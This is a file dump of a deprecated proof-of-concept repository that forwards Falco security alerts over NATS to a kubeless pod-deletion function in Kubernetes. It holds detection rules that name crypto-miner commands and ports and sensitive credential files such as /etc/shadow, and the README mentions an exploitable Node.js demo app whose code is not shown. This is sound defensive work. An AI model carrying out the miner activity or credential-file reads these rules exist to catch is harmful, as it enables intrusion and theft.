├── LICENSE ├── README.MD ├── falco-account.yaml ├── falco-config ├── falco.yaml ├── falco_rules.local.yaml └── falco_rules.yaml ├── falco-daemonset-configmap.yaml ├── falco-nats ├── Dockerfile ├── Makefile ├── nats-pub └── nats-pub.go ├── kubeless-function ├── README.md ├── delete-pod.py ├── falco-pod-delete-account.yaml ├── kubeless-cm.yaml └── requirements.txt ├── nats-cluster-via-CRD.yaml ├── nodejs-app ├── README.md ├── node-exploit │ ├── Dockerfile │ ├── package.json │ └── server.js ├── nodejs-app.yml └── nodejspayload.py └── read.sh /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.MD: -------------------------------------------------------------------------------- 1 | # THIS REPO IS DEPRECATED IN FAVOR OF THE [OFFICIAL EXAMPLE](https://github.com/falcosecurity/falco/tree/dev/integrations/kubernetes-response-engine) 2 | 3 | # Active Kubernetes Security with Falco, NATS, & kubeless 4 | 5 | This is a proof of concept that uses a Go NATS client to take alerts from Sysdig Falco and publish them to a NATS messaging server. Falco will detect abnormal behavior of the Kubernetes cluster in which it runs, then send an alert to the NATS client. This forwards the alert to the NATS Server. Subscribers can then subcribe to the subject `FALCO` on the NATS server to see Falco alerts, and take action on the alerts. A kubeless function is provided as an example to delete a Pod when a `CRITICAL` Falco alert is recieved. Multiple subscribers can take action on the same alert; for instance one archiving the alert, and another deleting the offending Pod. 6 | 7 | ## falco-config 8 | 9 | This contains Falco rules and a Falco config file. The rules are the default rules for Falco. The configuration file has been modified from the original as follows. 10 | 11 | ``` 12 | json_output: true 13 | ``` 14 | 15 | This changes the default output format to use a JSON output format instead of a logging output format. 16 | 17 | ``` 18 | # line. If keep_alive is set to false, the file will be re-opened 19 | # for each output message. 20 | # 21 | # Also, the file will be closed and reopened if falco is signaled with 22 | # SIGUSR1. 23 | 24 | file_output: 25 | enabled: true 26 | keep_alive: true 27 | filename: /var/run/falco/nats 28 | 29 | stdout_output: 30 | enabled: true 31 | 32 | ``` 33 | 34 | This enables sending Falco alerts to a file. Set `enabled` and `keep_alive` to true, and change the `filename` to the value shown. `keep_alive` is set to `true` because `/var/run/falco/nats` is actually a [named pipe](https://www.linuxjournal.com/article/2156) that the NATS client will read from. 35 | 36 | ## falco-nats 37 | 38 | This folder has a Go program that reads from the named pipe `/var/run/falco/nats` and publishes each Falco alert to the specified NATS server. Set your Docker org in the `Makefile`, then run `make` to build the Go program, and a container to run the client in. You'll need a [Go development environement](https://golang.org/doc/install) and the [Go NATS Client](https://github.com/nats-io/go-nats). 39 | 40 | The resulting `nats-pub` executable takes the following options. 41 | 42 | ``` 43 | -s The NATS server to connect to. Default: nats://nats:4222 44 | -f The named pipe to read from. Default: /var/run/falco/nats 45 | ``` 46 | 47 | For a NATS Server that can be deployed to Kubernetes, we leveraged [the example](http://kubeless.io/docs/quick-start/) in the Kubeless quick start. 48 | 49 | ## falco-daemonset-configmap.yaml 50 | 51 | This deploys Falco and the falco-nats container as a Kubernetes daemonset. It also deploys an [Init Container](https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) that creates a Linux named pipe on a shared volume. This volume is shared between the Falco container and the NATS client, and the named pipe is used to pass the Falco alerts between the two containers. This daemon set has the following changes from the [published version](https://github.com/draios/falco/tree/dev/examples/k8s-using-daemonset) for Falco. 52 | 53 | ``` 54 | spec: 55 | serviceAccount: falco-account 56 | containers: 57 | - name: falco-nats 58 | image: sysdiglabs/falco-nats:latest 59 | imagePullPolicy: Always 60 | volumeMounts: 61 | - mountPath: /var/run/falco/ 62 | name: shared-pipe 63 | - name: falco 64 | image: sysdig/falco:latest 65 | ``` 66 | 67 | Added the container for the NATS client. 68 | 69 | ``` 70 | args: [ "/usr/bin/falco", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes", "-pk", "-U"] 71 | volumeMounts: 72 | - mountPath: /var/run/falco/ 73 | name: shared-pipe 74 | readOnly: false 75 | - mountPath: /host/var/run/docker.sock 76 | ``` 77 | Added a `volumeMount` for our shared named pipe to the `falco` container. 78 | 79 | ``` 80 | name: falco-config 81 | initContainers: 82 | - name: init-pipe 83 | image: busybox 84 | command: ['mkfifo','/var/run/falco/nats'] 85 | volumeMounts: 86 | - mountPath: /var/run/falco/ 87 | name: shared-pipe 88 | readOnly: false 89 | volumes: 90 | - name: shared-pipe 91 | emptyDir: {} 92 | - name: docker-socket 93 | ``` 94 | Added an Init Container to create the named pipe. This helps us ensure the pipe is available for either container, as the Init Container must finish before either application container starts. 95 | 96 | To deploy the DaemonSet, run the below. 97 | 98 | ``` 99 | falco-nats$ kubectl create configmap falco-config --from-file=falco-config/ 100 | configmap "falco-config" created 101 | falco-nats$ kubectl create -f falco-account.yaml 102 | serviceaccount "falco-account" created 103 | clusterrole "falco-cluster-role" created 104 | clusterrolebinding "falco-cluster-role-binding" created 105 | falco-nats$ kubectl create -f falco-daemonset-configmap.yaml 106 | daemonset "falco" created 107 | ``` 108 | 109 | The daemonset can be verified by tailing the `falco-nat` container logs in one terminal, and shelling into the the `falco` container in another. This should send an alert that a shell was opened in a container. 110 | 111 | ``` 112 | # terminal 1 113 | falcoless$ kubectl logs -f falco-75r25 falco-nats 114 | Opened pipe /var/run/falco/nats 115 | Scanning /var/run/falco/ 116 | Published [FALCO] : '{"output":"16:57:40.936641184: Notice A shell was spawned in a container with an attached terminal (user=root k8s.pod=falco-b5hk7 container=7f25ca3dfdd1 shell=bash parent= cmdline=bash terminal=34816)","priority":"Notice","rule":"Terminal shell in container","time":"2018-04-19T16:57:40.936641184Z", "output_fields": {"container.id":"7f25ca3dfdd1","evt.time":1524157060936641184,"k8s.pod.name":"falco-b5hk7","proc.cmdline":"bash ","proc.name":"bash","proc.pname":null,"proc.tty":34816,"user.name":"root"}}' 117 | 118 | 119 | # terminal 2 120 | falco-nats$ kubectl exec -it falco-75r25 -c falco -- bash 121 | ``` 122 | 123 | ## nodejs-app 124 | 125 | This is an application that can be exploited via unsanitized data in a cookie. See the [README.MD](nodejs-app/README.MD) in the `nodejs-app` for more details. 126 | 127 | ## kubeless-function 128 | 129 | This is a kubeless function that subscribes to the NATS `FALCO` subject on the NATS server and fires when an alert is recieved. See the [README.MD](kubeless-function/README.MD) for more details. 130 | -------------------------------------------------------------------------------- /falco-account.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ServiceAccount 3 | metadata: 4 | name: falco-account 5 | --- 6 | kind: ClusterRole 7 | apiVersion: rbac.authorization.k8s.io/v1beta1 8 | metadata: 9 | name: falco-cluster-role 10 | rules: 11 | - apiGroups: ["extensions",""] 12 | resources: ["nodes","namespaces","pods","replicationcontrollers","services","events","configmaps"] 13 | verbs: ["get","list","watch"] 14 | - nonResourceURLs: ["/healthz", "/healthz/*"] 15 | verbs: ["get"] 16 | --- 17 | kind: ClusterRoleBinding 18 | apiVersion: rbac.authorization.k8s.io/v1beta1 19 | metadata: 20 | name: falco-cluster-role-binding 21 | namespace: default 22 | subjects: 23 | - kind: ServiceAccount 24 | name: falco-account 25 | namespace: default 26 | roleRef: 27 | kind: ClusterRole 28 | name: falco-cluster-role 29 | apiGroup: rbac.authorization.k8s.io 30 | -------------------------------------------------------------------------------- /falco-config/falco.yaml: -------------------------------------------------------------------------------- 1 | # File(s) or Directories containing Falco rules, loaded at startup. 2 | # The name "rules_file" is only for backwards compatibility. 3 | # If the entry is a file, it will be read directly. If the entry is a directory, 4 | # every file in that directory will be read, in alphabetical order. 5 | # 6 | # falco_rules.yaml ships with the falco package and is overridden with 7 | # every new software version. falco_rules.local.yaml is only created 8 | # if it doesn't exist. If you want to customize the set of rules, add 9 | # your customizations to falco_rules.local.yaml. 10 | # 11 | # The files will be read in the order presented here, so make sure if 12 | # you have overrides they appear in later files. 13 | rules_file: 14 | - /etc/falco/falco_rules.yaml 15 | - /etc/falco/falco_rules.local.yaml 16 | - /etc/falco/rules.d 17 | 18 | # Whether to output events in json or text 19 | json_output: true 20 | 21 | # When using json output, whether or not to include the "output" property 22 | # itself (e.g. "File below a known binary directory opened for writing 23 | # (user=root ....") in the json output. 24 | json_include_output_property: true 25 | 26 | # Send information logs to stderr and/or syslog Note these are *not* security 27 | # notification logs! These are just Falco lifecycle (and possibly error) logs. 28 | log_stderr: true 29 | log_syslog: true 30 | 31 | # Minimum log level to include in logs. Note: these levels are 32 | # separate from the priority field of rules. This refers only to the 33 | # log level of falco's internal logging. Can be one of "emergency", 34 | # "alert", "critical", "error", "warning", "notice", "info", "debug". 35 | log_level: info 36 | 37 | # Minimum rule priority level to load and run. All rules having a 38 | # priority more severe than this level will be loaded/run. Can be one 39 | # of "emergency", "alert", "critical", "error", "warning", "notice", 40 | # "info", "debug". 41 | priority: debug 42 | 43 | # Whether or not output to any of the output channels below is 44 | # buffered. Defaults to true 45 | buffered_outputs: true 46 | 47 | # A throttling mechanism implemented as a token bucket limits the 48 | # rate of falco notifications. This throttling is controlled by the following configuration 49 | # options: 50 | # - rate: the number of tokens (i.e. right to send a notification) 51 | # gained per second. Defaults to 1. 52 | # - max_burst: the maximum number of tokens outstanding. Defaults to 1000. 53 | # 54 | # With these defaults, falco could send up to 1000 notifications after 55 | # an initial quiet period, and then up to 1 notification per second 56 | # afterward. It would gain the full burst back after 1000 seconds of 57 | # no activity. 58 | 59 | outputs: 60 | rate: 1 61 | max_burst: 1000 62 | 63 | # Where security notifications should go. 64 | # Multiple outputs can be enabled. 65 | 66 | syslog_output: 67 | enabled: true 68 | 69 | # If keep_alive is set to true, the file will be opened once and 70 | # continuously written to, with each output message on its own 71 | # line. If keep_alive is set to false, the file will be re-opened 72 | # for each output message. 73 | # 74 | # Also, the file will be closed and reopened if falco is signaled with 75 | # SIGUSR1. 76 | 77 | file_output: 78 | enabled: true 79 | keep_alive: true 80 | filename: /var/run/falco/nats 81 | 82 | stdout_output: 83 | enabled: true 84 | 85 | # Possible additional things you might want to do with program output: 86 | # - send to a slack webhook: 87 | # program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX" 88 | # - logging (alternate method than syslog): 89 | # program: logger -t falco-test 90 | # - send over a network connection: 91 | # program: nc host.example.com 80 92 | 93 | # If keep_alive is set to true, the program will be started once and 94 | # continuously written to, with each output message on its own 95 | # line. If keep_alive is set to false, the program will be re-spawned 96 | # for each output message. 97 | # 98 | # Also, the program will be closed and reopened if falco is signaled with 99 | # SIGUSR1. 100 | 101 | 102 | 103 | -------------------------------------------------------------------------------- /falco-config/falco_rules.local.yaml: -------------------------------------------------------------------------------- 1 | #################### 2 | # Your custom rules! 3 | #################### 4 | 5 | # Add new rules, like this one 6 | # - rule: The program "sudo" is run in a container 7 | # desc: An event will trigger every time you run sudo in a container 8 | # condition: evt.type = execve and evt.dir=< and container.id != host and proc.name = sudo 9 | # output: "Sudo run in container (user=%user.name %container.info parent=%proc.pname cmdline=%proc.cmdline)" 10 | # priority: ERROR 11 | # tags: [users, container] 12 | 13 | # Or override/append to any rule, macro, or list from the Default Rules 14 | 15 | - macro: node_app_frontend 16 | condition: k8s.ns.name = node-app and k8s.pod.label.role = frontend and k8s.pod.label.app = node-app 17 | 18 | - rule: Detect crypto miners using the Stratum protocol 19 | desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp' 20 | condition: node_app_frontend and spawned_process and container.id != host and proc.cmdline contains stratum+tcp 21 | output: Possible miner ran inside a container (command=%proc.cmdline %container.info) 22 | priority: CRITICAL 23 | 24 | - list: miner_ports 25 | items: [ 26 | 3333, 4444, 8333, 7777, 7778, 3357, 27 | 3335, 8899, 8888, 5730, 5588, 8118, 28 | 6099, 9332, 1 29 | ] 30 | 31 | - macro: miner_port_connection 32 | condition: fd.sport in (miner_ports) 33 | 34 | - rule: Detect outbound connections to common miner pool ports 35 | desc: Miners typically connect to miner pools on common ports. 36 | condition: node_app_frontend and outbound and miner_port_connection 37 | output: "Outbound connection to common miner port (command=%proc.cmdline port=%fd.rport %container.info)" 38 | priority: CRITICAL -------------------------------------------------------------------------------- /falco-config/falco_rules.yaml: -------------------------------------------------------------------------------- 1 | # Currently disabled as read/write are ignored syscalls. The nearly 2 | # similar open_write/open_read check for files being opened for 3 | # reading/writing. 4 | # - macro: write 5 | # condition: (syscall.type=write and fd.type in (file, directory)) 6 | # - macro: read 7 | # condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory)) 8 | 9 | - macro: open_write 10 | condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0 11 | 12 | - macro: open_read 13 | condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0 14 | 15 | - macro: never_true 16 | condition: (evt.num=0) 17 | 18 | # In some cases, such as dropped system call events, information about 19 | # the process name may be missing. For some rules that really depend 20 | # on the identity of the process performing an action such as opening 21 | # a file, etc., we require that the process name be known. 22 | - macro: proc_name_exists 23 | condition: (proc.name!="") 24 | 25 | - macro: rename 26 | condition: evt.type in (rename, renameat) 27 | - macro: mkdir 28 | condition: evt.type = mkdir 29 | - macro: remove 30 | condition: evt.type in (rmdir, unlink, unlinkat) 31 | 32 | - macro: modify 33 | condition: rename or remove 34 | 35 | - macro: spawned_process 36 | condition: evt.type = execve and evt.dir=< 37 | 38 | # File categories 39 | - macro: bin_dir 40 | condition: fd.directory in (/bin, /sbin, /usr/bin, /usr/sbin) 41 | 42 | - macro: bin_dir_resolved 43 | condition: > 44 | (evt.abspath startswith /bin/ or 45 | evt.abspath startswith /sbin/ or 46 | evt.abspath startswith /usr/bin/ or 47 | evt.abspath startswith /usr/sbin/) 48 | 49 | - macro: bin_dir_mkdir 50 | condition: > 51 | (evt.arg[1] startswith /bin/ or 52 | evt.arg[1] startswith /sbin/ or 53 | evt.arg[1] startswith /usr/bin/ or 54 | evt.arg[1] startswith /usr/sbin/) 55 | 56 | - macro: bin_dir_rename 57 | condition: > 58 | evt.arg[1] startswith /bin/ or 59 | evt.arg[1] startswith /sbin/ or 60 | evt.arg[1] startswith /usr/bin/ or 61 | evt.arg[1] startswith /usr/sbin/ 62 | 63 | - macro: etc_dir 64 | condition: fd.name startswith /etc/ 65 | 66 | # This detects writes immediately below / or any write anywhere below /root 67 | - macro: root_dir 68 | condition: ((fd.directory=/ or fd.name startswith /root) and fd.name contains "/") 69 | 70 | - list: shell_binaries 71 | items: [bash, csh, ksh, sh, tcsh, zsh, dash] 72 | 73 | - list: shell_mgmt_binaries 74 | items: [add-shell, remove-shell] 75 | 76 | - macro: shell_procs 77 | condition: (proc.name in (shell_binaries)) 78 | 79 | - list: coreutils_binaries 80 | items: [ 81 | truncate, sha1sum, numfmt, fmt, fold, uniq, cut, who, 82 | groups, csplit, sort, expand, printf, printenv, unlink, tee, chcon, stat, 83 | basename, split, nice, "yes", whoami, sha224sum, hostid, users, stdbuf, 84 | base64, unexpand, cksum, od, paste, nproc, pathchk, sha256sum, wc, test, 85 | comm, arch, du, factor, sha512sum, md5sum, tr, runcon, env, dirname, 86 | tsort, join, shuf, install, logname, pinky, nohup, expr, pr, tty, timeout, 87 | tail, "[", seq, sha384sum, nl, head, id, mkfifo, sum, dircolors, ptx, shred, 88 | tac, link, chroot, vdir, chown, touch, ls, dd, uname, "true", pwd, date, 89 | chgrp, chmod, mktemp, cat, mknod, sync, ln, "false", rm, mv, cp, echo, 90 | readlink, sleep, stty, mkdir, df, dir, rmdir, touch 91 | ] 92 | 93 | # dpkg -L login | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" "," 94 | - list: login_binaries 95 | items: [ 96 | login, systemd, '"(systemd)"', systemd-logind, su, 97 | nologin, faillog, lastlog, newgrp, sg 98 | ] 99 | 100 | # dpkg -L passwd | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" "," 101 | - list: passwd_binaries 102 | items: [ 103 | shadowconfig, grpck, pwunconv, grpconv, pwck, 104 | groupmod, vipw, pwconv, useradd, newusers, cppw, chpasswd, usermod, 105 | groupadd, groupdel, grpunconv, chgpasswd, userdel, chage, chsh, 106 | gpasswd, chfn, expiry, passwd, vigr, cpgr 107 | ] 108 | 109 | # repoquery -l shadow-utils | grep bin | xargs ls -ld | grep -v '^d' | 110 | # awk '{print $9}' | xargs -L 1 basename | tr "\\n" "," 111 | - list: shadowutils_binaries 112 | items: [ 113 | chage, gpasswd, lastlog, newgrp, sg, adduser, deluser, chpasswd, 114 | groupadd, groupdel, addgroup, delgroup, groupmems, groupmod, grpck, grpconv, grpunconv, 115 | newusers, pwck, pwconv, pwunconv, useradd, userdel, usermod, vigr, vipw, unix_chkpwd 116 | ] 117 | 118 | - list: sysdigcloud_binaries 119 | items: [setup-backend, dragent, sdchecks] 120 | 121 | - list: docker_binaries 122 | items: [docker, dockerd, exe, docker-compose, docker-entrypoi, docker-runc-cur, docker-current] 123 | 124 | - list: k8s_binaries 125 | items: [hyperkube, skydns, kube2sky, exechealthz] 126 | 127 | - list: lxd_binaries 128 | items: [lxd, lxcfs] 129 | 130 | - list: http_server_binaries 131 | items: [nginx, httpd, httpd-foregroun, lighttpd, apache, apache2] 132 | 133 | - list: db_server_binaries 134 | items: [mysqld, postgres, sqlplus] 135 | 136 | - list: mysql_mgmt_binaries 137 | items: [mysql_install_d, mysql_ssl_rsa_s] 138 | 139 | - list: postgres_mgmt_binaries 140 | items: [pg_dumpall, pg_ctl, pg_lsclusters, pg_ctlcluster] 141 | 142 | - list: db_mgmt_binaries 143 | items: [mysql_mgmt_binaries, postgres_mgmt_binaries] 144 | 145 | - list: nosql_server_binaries 146 | items: [couchdb, memcached, redis-server, rabbitmq-server, mongod] 147 | 148 | - list: gitlab_binaries 149 | items: [gitlab-shell, gitlab-mon, gitlab-runner-b, git] 150 | 151 | - macro: server_procs 152 | condition: proc.name in (http_server_binaries, db_server_binaries, docker_binaries, sshd) 153 | 154 | # The explicit quotes are needed to avoid the - characters being 155 | # interpreted by the filter expression. 156 | - list: rpm_binaries 157 | items: [dnf, rpm, rpmkey, yum, '"75-system-updat"', rhsmcertd-worke, subscription-ma, 158 | repoquery, rpmkeys, rpmq, yum-cron, yum-config-mana, yum-debug-dump, 159 | abrt-action-sav, rpmdb_stat] 160 | 161 | - macro: rpm_procs 162 | condition: proc.name in (rpm_binaries) or proc.name in (salt-minion) 163 | 164 | - list: deb_binaries 165 | items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, apt, apt-get, aptitude, 166 | frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key, 167 | apt-listchanges, unattended-upgr, apt-add-reposit 168 | ] 169 | 170 | # The truncated dpkg-preconfigu is intentional, process names are 171 | # truncated at the sysdig level. 172 | - list: package_mgmt_binaries 173 | items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, sane-utils.post] 174 | 175 | - macro: package_mgmt_procs 176 | condition: proc.name in (package_mgmt_binaries) 177 | 178 | - macro: run_by_package_mgmt_binaries 179 | condition: proc.aname in (package_mgmt_binaries, needrestart) 180 | 181 | - list: ssl_mgmt_binaries 182 | items: [ca-certificates] 183 | 184 | - list: dhcp_binaries 185 | items: [dhclient, dhclient-script] 186 | 187 | # A canonical set of processes that run other programs with different 188 | # privileges or as a different user. 189 | - list: userexec_binaries 190 | items: [sudo, su, suexec] 191 | 192 | - list: known_setuid_binaries 193 | items: [ 194 | sshd, dbus-daemon-lau, ping, ping6, critical-stack-, pmmcli, 195 | filemng, PassengerAgent, bwrap, osdetect, nginxmng, sw-engine-fpm, 196 | start-stop-daem 197 | ] 198 | 199 | - list: user_mgmt_binaries 200 | items: [login_binaries, passwd_binaries, shadowutils_binaries] 201 | 202 | - list: dev_creation_binaries 203 | items: [blkid, rename_device, update_engine, sgdisk] 204 | 205 | - list: hids_binaries 206 | items: [aide] 207 | 208 | - list: vpn_binaries 209 | items: [openvpn] 210 | 211 | - list: nomachine_binaries 212 | items: [nxexec, nxnode.bin, nxserver.bin, nxclient.bin] 213 | 214 | - macro: system_procs 215 | condition: proc.name in (coreutils_binaries, user_mgmt_binaries) 216 | 217 | - list: mail_binaries 218 | items: [ 219 | sendmail, sendmail-msp, postfix, procmail, exim4, 220 | pickup, showq, mailq, dovecot, imap-login, imap, 221 | mailmng-core, pop3-login, dovecot-lda, pop3 222 | ] 223 | 224 | - list: mail_config_binaries 225 | items: [ 226 | update_conf, parse_mc, makemap_hash, newaliases, update_mk, update_tlsm4, 227 | update_db, update_mc, ssmtp.postinst, mailq, postalias, postfix.config., 228 | postfix.config, postfix-script 229 | ] 230 | 231 | - list: sensitive_file_names 232 | items: [/etc/shadow, /etc/sudoers, /etc/pam.conf] 233 | 234 | - macro: sensitive_files 235 | condition: > 236 | fd.name startswith /etc and 237 | (fd.name in (sensitive_file_names) 238 | or fd.directory in (/etc/sudoers.d, /etc/pam.d)) 239 | 240 | # Indicates that the process is new. Currently detected using time 241 | # since process was started, using a threshold of 5 seconds. 242 | - macro: proc_is_new 243 | condition: proc.duration <= 5000000000 244 | 245 | # Network 246 | - macro: inbound 247 | condition: ((evt.type=listen and evt.dir=>) or (evt.type=accept and evt.dir=<)) 248 | 249 | # Currently sendto is an ignored syscall, otherwise this could also 250 | # check for (evt.type=sendto and evt.dir=>) 251 | - macro: outbound 252 | condition: evt.type=connect and evt.dir=< and (fd.typechar=4 or fd.typechar=6) 253 | 254 | - macro: ssh_port 255 | condition: fd.sport=22 256 | 257 | # In a local/user rules file, you could override this macro to 258 | # enumerate the servers for which ssh connections are allowed. For 259 | # example, you might have a ssh gateway host for which ssh connections 260 | # are allowed. 261 | # 262 | # In the main falco rules file, there isn't any way to know the 263 | # specific hosts for which ssh access is allowed, so this macro just 264 | # repeats ssh_port, which effectively allows ssh from all hosts. In 265 | # the overridden macro, the condition would look something like 266 | # "fd.sip="a.b.c.d" or 